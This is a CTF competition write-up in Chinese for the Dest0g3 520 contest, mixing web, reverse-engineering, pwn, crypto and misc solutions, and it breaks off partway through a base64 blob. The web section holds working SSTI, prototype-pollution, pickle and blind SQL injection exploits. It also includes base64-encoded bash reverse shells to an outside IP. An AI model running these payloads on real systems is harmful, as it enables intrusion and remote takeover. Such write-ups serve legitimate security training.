Dest0g3 520迎新赛
积分榜
Web
SimpleRCE
非预期
盲读/flag,通过请求头传入参数绕过waf
预期
利用原生类!
phpdest
原题:https://www.shawroot.cc/1917.html
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
require_once $_GET['file'];
}
payload:
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
EasyPHP
<?php
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H");
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){
echo $fl4g;
}else{
echo "Try harder!";
}
set_error_handler(
function() use(&$fl4g) {
print $fl4g;
}
);
$fl4g .= $dest0g3;
?>
触发报错就可以把flag输出,直接传个数组进去就ok!
EasySSTI
学习了feng师傅的文章
https://blog.csdn.net/rfrder/article/details/115272645?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165313511116780366513158%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165313511116780366513158&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2blogfirst_rank_ecpm_v1~rank_v31_ecpm-5-115272645-null-null.nonecase&utm_term=ssti
payload如下:
{%set%0aid=dict(ind=a,ex=a)|join%}{%set%0app=dict(po=a,p=a)|join%}{%set%0ann=dict(n=a)|join%}{%set%0aenv=dict(env=a)|join%}{%set%0appe=dict(po=a,pen=a)|join%}{%set%0att=dict(t=a)|join%}{%set%0agt=dict(ge=a,t=a)|join%}{%set%0aff=dict(f=a)|join%}{%set%0aooqq=dict(o=a,s=a)|join%}{%set%0afive=(lipsum|string|list)|attr(id)(tt)%}{%set%0ard=dict(re=a,ad=a)|join%}{%set%0athree=(lipsum|string|list)|attr(id)(nn)%}{%set%0aone=(lipsum|string|list)|attr(id)(ff)%}{%set%0ashiba=five*five-three-three-one%}{%set%0axiahuaxian=(lipsum|string|list)|attr(pp)(shiba)%}{%set%0agb=(xiahuaxian,xiahuaxian,dict(glob=a,als=a)|join,xiahuaxian,xiahuaxian)|join%}{%set%0abin=(xiahuaxian,xiahuaxian,dict(built=a,ins=a)|join,xiahuaxian,xiahuaxian)|join%}{%set%0aini=(xiahuaxian,xiahuaxian,dict(in=a,it=a)|join,xiahuaxian,xiahuaxian)|join%}{%set%0achcr=(lipsum|attr(gb))|attr(gt)(bin)%}{{(lipsum|attr(gb))|attr(gt)(ooqq)|attr(ppe)(env)|attr(rd)()}}
NodeSoEasy
非预期
网上直接找到链子捡漏拿一血https://www.anquanke.com/post/id/236354#h2-2
{
"__proto__": {
"client": true,
"escapeFunction": "1; return global.process.mainModule.constructor._load('child_process').execSync('cat /flag');",
"compileDebug": true
}
}
预期
{"__proto__":{"__proto__":{"client":true,"escape":"1; return global.process.mainModule.constructor._load('child_process').execSync('dir');","compileDebug":true,"debug":true}}}
funny_upload
非预期
上传.htaccess文件直接预加载/flag获得flag
预期
传入base64编码后的图片马
使用.htaccess包含文件,并使用php://filter进行base64解码
这里没有查看phpinfo,直接进行系统命令执行了,所以才会出现非预期解哪一步,以为是把什么过滤了
查看phpinfo,发现过滤了好多函数,连蚁剑看到根目录的flag,
或者使用var_dump(scandir('/'));查看根目录,
之后就和非预期一样,使用蚁剑绕过disable未成功
middle
学习文章:
https://chenlvtang.top/2021/08/23/Python之Pickle反序列化/
https://www.cnblogs.com/cioi/p/12464592.html
直接手撕反序列化:
import pickle
import base64
payload = b'''cconfig\nbackdoor\n(]S"os.system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA+JjE=|base64 -d|bash -i')"\natR.'''
print(base64.b64encode(payload))
print(pickle.loads(payload))
data=Y2NvbmZpZwpiYWNrZG9vcgooXVMib3Muc3lzdGVtKCdlY2hvIFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDODRNaTR4TlRjdU1UYzBMakl5Tmk4NU9UazVJREErSmpFPXxiYXNlNjQgLWR8YmFzaCAtaScpIgphdFIu
反弹shell
Really Easy SQL
hint:
$black_list=array('union','updatexml','order','by','substr',' ','and','extractvalue',';','sleep','join','alter','handler','char','+','/','like','regexp','offset','sleep','case','&','-','hex','%0','load’);
过滤了sleep,正确使用benchmark后成功得到注入点(都可以使用等价函数或者大小写绕过这里我在username和password放了相同的payload才有用,我不知道是为什么
payload:
# 获得长度
0'or(if((length(({payload}))>{mid}),benchmark(200000,md5('123')),0))or'0
# 获取内容
0'or(if((ascii(mid(({payload}),{i},1))={j}),benchmark(200000,md5('123')),0))or'0
exp.py
import requests
from time import time, sleep
url = "http://9f802cce-9c30-432c-917b-e95b507b060e.node4.buuoj.cn:81/index.php" # 注入位置
# payload = "select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')"
# payload = "select(group_concat(column_name))from(information_schema.columns)where(table_schema='ctf')"
payload = "select(group_concat(cmd))from(ctf.flaggg)"
def lensqlblind():
start = 0
end = 100
while True:
mid = (start + end) // 2
data = {
'username':
f"0'or(if((length(({payload}))>{mid}),benchmark(200000,md5('123')),0))or'0",
'password':
f"0'or(if((length(({payload}))>{mid}),benchmark(200000,md5('123')),0))or'0"
}
t = time()
r = requests.post(url, data=data)
# print(r.request.body)
if start >= end:
return start
break
elif time() - t > 0.3:
start = mid + 1
else:
end = mid - 1
def contentblind(lenth):
flag = ''
i = 39
while i <= lenth:
for j in range(32, 127):
print(j, end='')
data = {
'username':
f"0'or(if((ascii(mid(({payload}),{i},1))={j}),benchmark(200000,md5('123')),0))or'0",
'password':
f"0'or(if((ascii(mid(({payload}),{i},1))={j}),benchmark(200000,md5('123')),0))or'0"
}
gap = 0.3
t = time()
r = requests.post(url, data=data)
while r.status_code != 200:
sleep(3)
gap += 3
r = requests.post(url, data=data)
if time() - t > gap:
flag += chr(j)
print()
print(flag)
i += 1
break
# lenth = lensqlblind()
# print(lenth)
# lenth = 10
# lenth = 21
lenth = 45
contentblind(lenth)
# database(): ctf
# tables: flaggg, user
# columns: cmd,username,password
# flaggg.cmd: Dest0g3{b6314cd5-cf5c-4478-b89c-e27643dff64e}
easysql
同理,就是过滤的东西比really多了点
payload:
# 获取长度
0'or(length(({payload}))!={mid})or(benchmark(300000,md5('123')))or'0
# 获取内容
0'or(mid(({payload}),{i},1)!='{j}')or(benchmark(300000,md5('123')))or'0
exp.py
import requests
from time import time, sleep
import string
url = "http://6d55819e-6ddf-481f-bb34-ad110a6613c8.node4.buuoj.cn:81/index.php" # 注入位置
# payload = "select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')"
# payload = "select(group_concat(column_name))from(information_schema.columns)where(table_schema='ctf')"
payload = "select(group_concat(cmd))from(ctf.flaggg)"
# payload = "database()"
def lensqlblind():
# start = 0
# end = 100
# while True:
for mid in range(40, 50):
# mid = (start + end) // 2
print(mid, end='')
data = {
'username':
f"0'or(length(({payload}))!={mid})or(benchmark(300000,md5('123')))or'0",
'password':
f"0'or(length(({payload}))!={mid})or(benchmark(300000,md5('123')))or'0"
}
gap = 0.8
t = time()
r = requests.post(url, data=data)
while r.status_code != 200:
sleep(3)
gap += 3
r = requests.post(url, data=data)
# print(r.request.body)
# if start >= end:
# return start
# break
# elif time() - t > 0.4:
# start = mid + 1
# else:
# end = mid - 1
if time() - t > gap:
print('')
return mid
break
def contentblind(lenth):
flag = ''
i = 33
while i <= lenth:
for j in "{}-,=" + string.digits + string.ascii_lowercase:
# for j in range(0, 127):
print(j, end='')
# j = chr(j)
data = {
'username':
f"0'or(mid(({payload}),{i},1)!='{j}')or(benchmark(300000,md5('123')))or'0",
'password':
f"0'or(mid(({payload}),{i},1)!='{j}')or(benchmark(300000,md5('123')))or'0"
}
gap = 0.8
t = time()
r = requests.post(url, data=data)
while r.status_code != 200:
sleep(3)
gap += 3
r = requests.post(url, data=data)
if time() - t > gap:
flag += j
print()
print(flag)
i += 1
break
# lenth = lensqlblind()
# print(lenth)
# lenth = 3
# lenth = 10
# lenth = 21
lenth = 45
contentblind(lenth)
# database(): ctf
# tables: flaggg, user
# columns: cmd,username,password
# flaggg.cmd: Dest0g3{b6314cd5-cf5c-4478-b89c-e27643dff64e}
# flaggg.cmd: Dest0g3{75773d9a-098c-49ac-ab34-714b7d25f471}
PharPOP
https://copyfuture.com/blogs-details/202112170451080648
构造pop链
<?php
class air{
public $p;
public function __construct()
{
// $this->p = new tree;
}
}
class tree{
public $name;
public $act;
public function __construct()
{
$this->name = new apple;
// $this->act = 'FilesystemIterator';
$this->act = 'SplFileObject';
}
}
class apple {
public $xxx;
public $flag;
public function __construct()
{
// $this->xxx = new air;
// $this->flag = 'glob:///f*';
$this->flag = '/fflaggg';
}
}
class banana {
public function __construct()
{
$this->name = new air;
}
}
$o = new tree;
$o->name->xxx = new air;
$o->name->xxx->p = new tree;
// echo serialize($o);
echo urlencode(serialize($o));
// class D {
// public $start = 'r';
// }
// $a = new D;
// echo serialize($a);
// echo "\n";
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("__HALT_COMPILER(); \?\>");
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
// echo urlencode(file_get_contents('234.phar.gz'));
修改构造好的phar文件,并修改内容强制GC(垃圾处理机制)http://blog.m1kael.cn/index.php/archives/14/
修改后phar文件会受损,需要修复
from hashlib import sha1
f = open('phar.phar', 'rb').read()
s = f[:-28]
h = f[-8:]
newf = s + sha1(s).digest() + h
open('234.phar', 'wb').write(newf)
修复好之后需要隐藏内容特征绕过waf
使用gzip绕过:https://guokeya.github.io/post/uxwHLckwx/
gzip 234.phar
然后进行上传
然后直接访问即可
EzSerial
反序列化利用工具:
https://github.com/frohoff/ysoserial
使用ysoserial打了下URLDNS发现dnslog有回显,把所有cc链都试了一遍都没反弹过来
猜测payload长度限制缩短payload工具,绕过长度检测:
https://github.com/4ra1n/ShortPayload
通过cc6反弹成功,这里非常注意反弹shell的写法,一定不能错!
正确的反弹shell
java -jar ShortPayload-1.0.jar CC6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"
这是错误的!
java -jar ShortPayload-1.0.jar CC6 "echo YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA+JjE=|base64 -d|bash -i"
ezip
setu有源码:
upload.php:
<?php
error_reporting(0);
include("zip.php");
if(isset($_FILES['file']['name'])){
if(strstr($_FILES['file']['name'],"..")||strstr($_FILES['file']['name'],"/")){
echo "hacker!!";
exit;
}
if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION)!="zip"){
echo "only zip!!";
exit;
}
$Myzip = new zip($_FILES['file']['name']);
mkdir($Myzip->path);
move_uploaded_file($_FILES['file']['tmp_name'], './'.$Myzip->path.'/' . $_FILES['file']['name']);
echo "Try to unzip your zip to /".$Myzip->path."<br>";
if($Myzip->unzip()){echo "Success";}else{echo "failed";}
}
zip.php:
<?php
class zip
{
public $zip_name;
public $path;
public $zip_manager;
public function __construct($zip_name){
$this->zip_manager = new ZipArchive();
$this->path = $this->gen_path();
$this->zip_name = $zip_name;
}
public function gen_path(){
$chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$newchars=str_split($chars);
shuffle($newchars);
$chars_key=array_rand($newchars,15);
$fnstr = "";
for($i=0;$i<15;$i++){
$fnstr.=$newchars[$chars_key[$i]];
}
return md5($fnstr.time().microtime()*100000);
}
public function deldir($dir) {
//先删除目录下的文件:
$dh = opendir($dir);
while ($file = readdir($dh)) {
if($file != "." && $file!="..") {
$fullpath = $dir."/".$file;
if(!is_dir($fullpath)) {
unlink($fullpath);
} else {
$this->deldir($fullpath);
}
}
}
closedir($dh);
}
function dir_list($directory)
{
$array = [];
$dir = dir($directory);
while ($file = $dir->read()) {
if ($file !== '.' && $file !== '..') {
$array[] = $file;
}
}
return $array;
}
public function unzip()
{
$fullpath = "/var/www/html/".$this->path."/".$this->zip_name;
$white_list = ['jpg','png','gif','bmp'];
$this->zip_manager->open($fullpath);
for ($i = 0;$i < $this->zip_manager->count();$i ++) {
if (strstr($this->zip_manager->getNameIndex($i),"../")){
echo "you bad bad";
return false;
}
}
if(!$this->zip_manager->extractTo($this->path)){
echo "Unzip to /".$this->path."/ failed";
exit;
}
@unlink($fullpath);
$file_list = $this->dir_list("/var/www/html/".$this->path."/");
for($i=0;$i<sizeof($file_list);$i++){
if(is_dir($this->path."/".$file_list[$i])){
echo "dir? I deleted all things in it"."<br>";@$this->deldir("/var/www/html/".$this->path."/".$file_list[$i]);@rmdir("/var/www/html/".$this->path."/".$file_list[$i]);
}
else{
if(!in_array(pathinfo($file_list[$i], PATHINFO_EXTENSION),$white_list)) {echo "only image!!! I deleted it for you"."<br>";@unlink("/var/www/html/".$this->path."/".$file_list[$i]);}
}
}
return true;
}
}
压缩shell.php和1.txt为zip,用010修改如下:
直接访问上传的php
这里读取flag需要使用nl,suid提权!
ljctr
查看DemoApplication.jar
Reverse
simpleXOR
#include<stdio.h>
#include<stdlib.h>
int main()
{
char result[36] =
{
0xB3, 0x91, 0x82, 0x80, 0xC3,
0x9B, 0xCE, 0x75, 0xCF, 0x9C,
0x9A, 0x85, 0x85, 0xCD, 0xB8,
0x84, 0xAA, 0x7D, 0xBD, 0xBB,
0xB1, 0xB5, 0x96, 0x71, 0x8D,
0x9E, 0x86, 0xBF, 0x73, 0xA8,
0xA3, 0x9C, 0x83, 0x65, 0x9E,
0x57
};
for (int i = 0; i < 36; i++)
{
result[i] = (result[i] ^ 0xf7) - i;
printf("%c", result_0[i]);
}
return 0;
};
hi
x = [0x7B, 0x51, 0xF3, 0x5A, 0xCC, 0x39, 0xF9, 0x92, 0x1C, 0x9E, 0x58, 0x69, 0x9D, 0xF7, 0xFD, 0x4A, 0x3E, 0xFB, 0x1D, 0x2C, 0x4D, 0x0C, 0x70, 0xB1, 0x3B, 0x8D, 0x25, 0xED, 0x91, 0xB1, 0x73, 0x8D, 0x82, 0xE6, 0xE7, 0x50, 0x20, 0x61, 0x62, 0x3C, 0x00, 0x3A, 0xA6, 0x9D, 0x32]
v6 = [0x97, 0x64, 0x48, 0xC6, 0x1C, 0x7A, 0x8E, 0x9F, 0x46, 0xBD,0x60, 0xE7, 0x82, 0xF3, 0xEE, 0x69, 0x49, 0xF7, 0x0E, 0xE3,0xE2, 0x17, 0xC0, 0xB9, 0x2C, 0x39, 0x30, 0xA4, 0x48, 0x01,0x41, 0x98, 0x39, 0xA9, 0xB5, 0xE5, 0x11, 0x74, 0x0E, 0xE8,0xAC, 0xFD, 0x8B, 0xA5, 0x6D]
flag = ''
for i in range (len(x)):
for j in range (32,128):
v5 = 23 * j
a=(((v5 + x[i]) >> 31) >> 24) +v5 + x[i] - (((v5 + x[i]) >> 31) >> 24)&0xff
if a == v6[i]:
flag += chr(j)
print(flag)
tttea
TLS先赋值
再计算
0x03, 0x23, 0x22, 0x2F, 0x36, 0x88, 0xFD, 0x43, 0x21, 0xE8,
0x5B, 0x65, 0x31, 0x1E, 0x3B, 0xA6, 0x4B, 0xB8, 0xDC, 0x88,
0x80, 0x19, 0x84, 0x6F, 0x97, 0x72, 0x21, 0x26, 0xAD, 0x64,
0xEE, 0xBB, 0x88, 0x04, 0x4D, 0x06, 0x2F, 0x26, 0xE5, 0x6B,
0x81, 0x4B, 0xF5, 0x73
0x2f222303,0x43fd8836,0x655be821,0xa63b1e31,0x88dcb84b,0x6f841980,0x26217297,0xbbee64ad,0x064d0488,0x6be5262f,0x73f54b81
魔改了两处,有两个tls回调函数,需要改ZF寄存器执行if语句内部,得到delta
这里原xxtea是右移5
然后可以看出a3是delta,key取a3的四个字节,也就是将0x74746561小端序变成
0x61,0x65,0x74,0x74填充key
exp
#include <stdio.h>
#include <stdint.h>
#define DELTA 0x74746561
#define MX (((z >> 6 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z)))
void btea(uint32_t *v, int n, uint32_t const key[4])
{
uint32_t y, z, sum;
unsigned p, rounds, e;
if (n > 1) /* Coding Part */
{
rounds = 6 + 52 / n;
sum = 0;
z = v[n - 1];
do
{
sum += DELTA;
e = (sum >> 2) & 3;
for (p = 0; p < n - 1; p++)
{
y = v[p + 1];
z = v[p] += MX;
}
y = v[0];
z = v[n - 1] += MX;
} while (--rounds);
}
else if (n < -1) /* Decoding Part */
{
n = -n;
rounds = 6 + 52 / n;
sum = rounds * DELTA;
y = v[0];
do
{
e = (sum >> 2) & 3;
for (p = n - 1; p > 0; p--)
{
z = v[p - 1];
y = v[p] -= MX;
}
z = v[n - 1];
y = v[0] -= MX;
sum -= DELTA;
} while (--rounds);
}
}
int main()
{
/*
原数据为: 传进去的参数为:
0xbc 0xa5 0xce 0x40 ->0x40cea5bc
0xf4 0xb2 0xb2 0xe7 ->0xe7b2b2f4
0xa9 0x12 0x9d 0x12 ->0x129d12a9
0xae 0x10 0xc8 0x5b ->0x5bc810ae
0x3d 0xd7 0x06 0x1d ->0x1d06d73d
0xdc 0x70 0xf8 0xdc ->0xdcf870dc
*/
uint32_t v[11] = {0x2f222303, 0x43fd8836, 0x655be821, 0xa63b1e31, 0x88dcb84b, 0x6f841980, 0x26217297, 0xbbee64ad, 0x64d0488, 0x6be5262f, 0x73f54b81};
/*
假设密钥为字符串 'flag' 十六进制表示为 0x66 0x6c 0x61 0x67
传进去的参数就要转换成 0x67616c66
*/
// 0x74746561
uint32_t const k[4] = {
(unsigned int)0x61, (unsigned int)0x65,
(unsigned int)0x74, (unsigned int)0x74};
int n = sizeof(v) / sizeof(uint32_t); // n的绝对值表示v的长度,取正表示加密,取负表示解密
// v为要加密的数据是两个32位无符号整数
// k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位
// printf("加密前原始数据:%u %u\n", v[0], v[1]);
// btea(v, n, k);
// printf("加密后的数据:%u %u\n", v[0], v[1]);
btea(v, -n, k);
printf("解密后数据:\n");
for (int i = 0; i < n; i++)
{
// printf("0x%x ", v[i]);
for (int j = 0; j < 4; j++)
{
printf("%c", (v[i] >> (j * 8)) & 0xFF);
}
}
printf("\n");
return 0;
}
Pwn
ez_aarch
from pwn import *
context.binary = 'stack'
io = remote('node4.buuoj.cn', 28579)
payload = p64(0)*5 + p32(0x93C)
io.sendafter(b'Please leave your name:\n', payload)
io.interactive()
ez_pwn
from pwn import *
from LibcSearcher import LibcSearcher
context.binary = './ez_pwn'
io = remote('node4.buuoj.cn', 27361)
def hex_uint32(n):
return hex((n + 0x100000000) & 0xFFFFFFFF)
def add_num(num):
io.sendlineafter(b'input your choice:\n', b'1')
io.sendlineafter(b'input num\n', num)
def get_num():
io.sendlineafter(b'input your choice:\n', b'2')
io.recvuntil(b'sum = ')
return int(io.recvuntil(b'\n', drop=True))
io.sendlineafter(b'input the length of array:\n', b'-1')
for i in range(6):
add_num(b'0')
add_num(b'+')
x = get_num()
libc_base = x - 0x6e155
print(hex_uint32(x))
for i in range(7, 18):
add_num(b'+')
add_num(str(libc_base + 0x3cdea).encode())
io.sendlineafter(b'input your choice:\n', b'4')
io.interactive()
Crypto
babyRSA
工具真好用,费马分解n之后直接解明文就好
babyAES
先转hex
import binascii
ass = []
ass.append(b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07')
ass.append(b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80')
ass.append(b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F')
for a in ass:
str_hex = str(binascii.b2a_hex(a))[2:-1]
print(str_hex)
# 43343a865124b0d11ba94c00ada3ff9620684a1b7e1cd1798741fe30e2fbc7b77f5ec89a50da58c6df176c3d4b95d037
# d1df8f290877def9795825ca5bcb1880
# a4a64dab7bf697943e684b9b42655d46
工具解密666
ezDLP
import sympy
from Crypto.Util.number import *
g = 19
p = 335215034881592512312398694238485179340610060759881511231472142277527176340784432381542726029524727833039074808456839870641607412102746854257629226877248337002993023452385472058106944014653401647033456174126976474875859099023703472904735779212010820524934972736276889281087909166017427905825553503050645575935980580803899122224368875197728677516907272452047278523846912786938173456942568602502013001099009776563388736434564541041529106817380347284002060811645842312648498340150736573246893588079033524476111268686138924892091575797329915240849862827621736832883215569687974368499436632617425922744658912248644475097139485785819369867604176912652851123185884810544172785948158330991257118563772736929105360124222843930130347670027236797458715653361366862282591170630650344062377644570729478796795124594909835004189813214758026703689710017334501371279295621820181402191463184275851324378938021156631501330660825566054528793444353
h = 199533304296625406955683944856330940256037859126142372412254741689676902594083385071807594584589647225039650850524873289407540031812171301348304158895770989218721006018956756841251888659321582420167478909768740235321161096806581684857660007735707550914742749524818990843357217489433410647994417860374972468061110200554531819987204852047401539211300639165417994955609002932104372266583569468915607415521035920169948704261625320990186754910551780290421057403512785617970138903967874651050299914974180360347163879160470918945383706463326470519550909277678697788304151342226439850677611170439191913555562326538607106089620201074331099713506536192957054173076913374098400489398228161089007898192779738439912595619813699711049380213926849110877231503068464392648816891183318112570732792516076618174144968844351282497993164926346337121313644001762196098432060141494704659769545012678386821212213326455045335220435963683095439867976162
x = sympy.discrete_log(p, h, g)
print(x)
print(long_to_bytes(x))
直接输出flag
ezStream
from Crypto.Util.number import *
from alive_progress import alive_bar
a = 3939333498
b = 3662432446
m = 2271373817
state1 = 17362
state2 = 20624
class LCG:
def __init__(self, seed):
self.a = a
self.b = b
self.m = m
self.seed = seed
def next(self):
self.seed = (self.a * self.seed + self.b) % self.m
return self.seed >> 16
def output(self):
print("a = {}\nb = {}\nm = {}".format(self.a, self.b, self.m))
print("state1 = {}".format(self.next()))
print("state2 = {}".format(self.next()))
# with alive_bar(0x10000000) as bar:
# for i in range(0x10000000):
# lcg = LCG(i)
# if lcg.next() == state1:
# if lcg.next() == state2:
# print(i)
# break
# bar()
# 104984523
enc_flag_i = 600017039001091357643174067454938198067935635401496485588306838343558125283178792619821966678282131419050878
flag = ''
lcg = LCG(104984523)
lcg.output()
enc_flag = long_to_bytes(enc_flag_i)
print(enc_flag)
cur = 0
pt = ['*'] * len(enc_flag)
for i in range(len(enc_flag)):
state = lcg.next()
shit = True
for k in range(32, 127):
if enc_flag[cur] == (k ^ (state % 10)):
pt[cur] = chr(k)
cur += 1
break
print(''.join(pt))
Misc
Welcome to fxxking DestCTF
公众号签个到:Dest0g3{W31c0m3_t0_DestCTF2022!}
Pngenius
binwalk分离压缩包,密码解压里边就是flag
EasyEncode
6位密码爆破
摩斯密码
Hex解码
Unicode decode
urldecode
base64 decode
之后获得flag:Dest0g3{Deoding_1s_e4sy_4_U}
StrangeTraffic
RGVzdDBnM3szMUE1QkVBNi1GMjBELUYxOEEtRThFQS0yOUI0RjI1NzEwOEJ9
Dest0g3{31A5BEA6-F20D-F18A-E8EA-29B4F257108B}\
你知道js吗
改zip,word/document.xml里边base64解码
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pgo8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+Cjx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4KICAgICAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSIvPgo8YXBwbGljYXRpb24geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4KICAgICAgICA8ZHBpQXdhcmVuZXNzIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL1NNSS8yMDE2L1dpbmRvd3NTZXR0aW5ncyI+RG8geW91IGtub3cganM8L2RwaUF3YXJlbmVzcz4KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQ2h0bWwlM0UlMEElM0Nib2R5JTNFJTBBJTBBJTNDJTIxRE9DVFlQRSUyMGh0bWwlM0UlMEElM0NodG1sJTNFJTBBJTNDaGVhZCUzRSUwQSUyMCUyMCUyMCUyMCUzQ3RpdGxlJTNFRG8lMjBZb3UlMjBLbm93JTIwanMlM0MlMkZ0aXRsZSUzRSUwQSUzQ0hUQSUzQUFQUExJQ0FUSU9OJTBBJTIwJTIwQVBQTElDQVRJT05OQU1FJTNEJTIyRG8lMjBZb3UlMjBLbm93JTIwanMlMjIlMEElMjAlMjBJRCUzRCUyMkluY2VwdGlvbiUyMiUwQSUyMCUyMFZFUlNJT04lM0QlMjIxLjAlMjIlMEElMjAlMjBTQ1JPTEwlM0QlMjJubyUyMiUyRiUzRSUwQSUyMCUwQSUzQ3N0eWxlJTIwdHlwZSUzRCUyMnRleHQlMkZjc3MlMjIlM0UlMEElM0MlMkZoZWFkJTNFJTBBJTIwJTIwJTIwJTIwJTNDZGl2JTIwaWQlM0QlMjJmZWF0dXJlJTIyJTNFJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDZGl2JTIwaWQlM0QlMjJjb250ZW50JTBBJTA5JTA5JTA5JTA5JTNDJTJGc3R5bGUlM0UlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0NoMSUyMGlkJTNEJTIydW5hdmFpbGFibGUlMjIlMjBjbGFzcyUzRCUyMmxvYWRpbmclMjIlM0VCdWlsZGluZyUyMGpzLi4uLi4lM0MlMkZoMSUzRSUwQSUwOSUwOSUwOSUwOSUzQ3NjcmlwdCUyMHR5cGUlM0QlMjJ0ZXh0JTJGamF2YXNjcmlwdCUyMiUyMGxhbmd1YWdlJTNEJTIyamF2YXNjcmlwdCUyMiUzRSUwQSUwOSUwOSUwOSUwOSUwOWZ1bmN0aW9uJTIwUnVuRmlsZSUyOCUyOSUyMCU3QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMHZhciUyMFdzaFNoZWxsJTIwJTNEJTIwbmV3JTIwQWN0aXZlWE9iamVjdCUyOCUyMldTY3JpcHQuU2hlbGwlMjIlMjklM0IlMEElMDklMDklMDklMDklMDlXc2hTaGVsbC5SdW4lMjglMjJub3RlcGFkJTIwJTI1d2luZGlyJTI1JTJGRGVza3RvcCUyRmpzLnR4dCUyMiUyQyUyMDElMkMlMjBmYWxzZSUyOSUzQiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyRiolMjB2YXIlMjBvRXhlYyUyMCUzRCUyMFdzaFNoZWxsLkV4ZWMlMjglMjJub3RlcGFkJTIyJTI5JTNCJTIwKiUyRiUwQSUwOSUwOSUwOSUwOSUwOSU3RCUwQSUwOSUwOSUwOSUwOSUzQyUyRnNjcmlwdCUzRSUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUzQyUyRmRpdiUzRSUwQSUyMCUyMCUyMCUyMCUzQyUyRmRpdiUzRSUwQSUzQ2JvZHklM0UlMEElMDklM0NpbnB1dCUyMHR5cGUlM0QlMjJidXR0b24lMjIlMjB2YWx1ZSUzRCUyMkltcGxhbnQlMjBJbmNlcHRpb24lMjBIZXJlJTIyJTIwb25jbGljayUzRCUyMlJ1bkZpbGUlMjglMjklM0IlMjIlMkYlM0UlMEElMDklM0NwJTIwc3R5bGUlM0QlMjJjb2xvciUzQXdoaXRlJTNCJTIyJTNFJTBBJTBBJTJCJTJCJTJCJTJCJTJCJTIwJTJCJTJCJTVCLSUzRSUyMCUyQiUyQiUyQiUyQiUyQiUyMCUyQiUyQiUzQyU1RCUzRSUyMCUyQiUyQiUyQi4uJTIwJTJCJTJCLi0uJTIwJTJCJTJCLi0tJTIwLS0uJTJCJTJCJTIwJTJCJTJCLi0tJTIwJTBBLS4tLi0lMjAtLS4lMkIlMkIlMjAlMkIlMkIlMkIlMkIuJTBBJTJCLi0tLSUyMC0uLiUyQiUyQiUyMCUyQiUyQi4lM0MlMkIlMjAlMkIlMkIlNUItJTNFJTIwJTJCJTJCJTJCJTNDJTVEJTIwJTNFJTJCJTJCLiUzQyUyMCUyQiUyQiUyQiU1Qi0lMjAlMEElM0UtLS0lM0MlMjAlNUQlM0UtLS0lMjAtLS0uJTJCJTIwJTJCJTJCJTJCJTJCLiUyMC0tLS0tJTBBLiUyQiUyQiUyQi4lMjAuLi4tLSUyMC0tLS4lMkIlMjAlMkIlMkIlMkIlMkIuJTIwLS0tLiUyQiUyMCUyQiUyQi4tLSUyMC0tLS4lMkIlMjAlMkIlMkIlMkIlMkIuJTIwLS0tLi4lMjAlMkIlMkIlMkIlMkIlMkIlMjAlMkIuLS0tJTIwLS0tLS4lMEElM0MlMkIlMkIlMkIlMkIlMjAlNUItJTNFJTJCJTJCJTIwJTJCJTJCJTNDJTVEJTNFJTIwJTJCJTJCLiUzQyUyQiUyMCUyQiUyQiUyQiU1Qi0lMjAlM0UtLS0tJTIwJTNDJ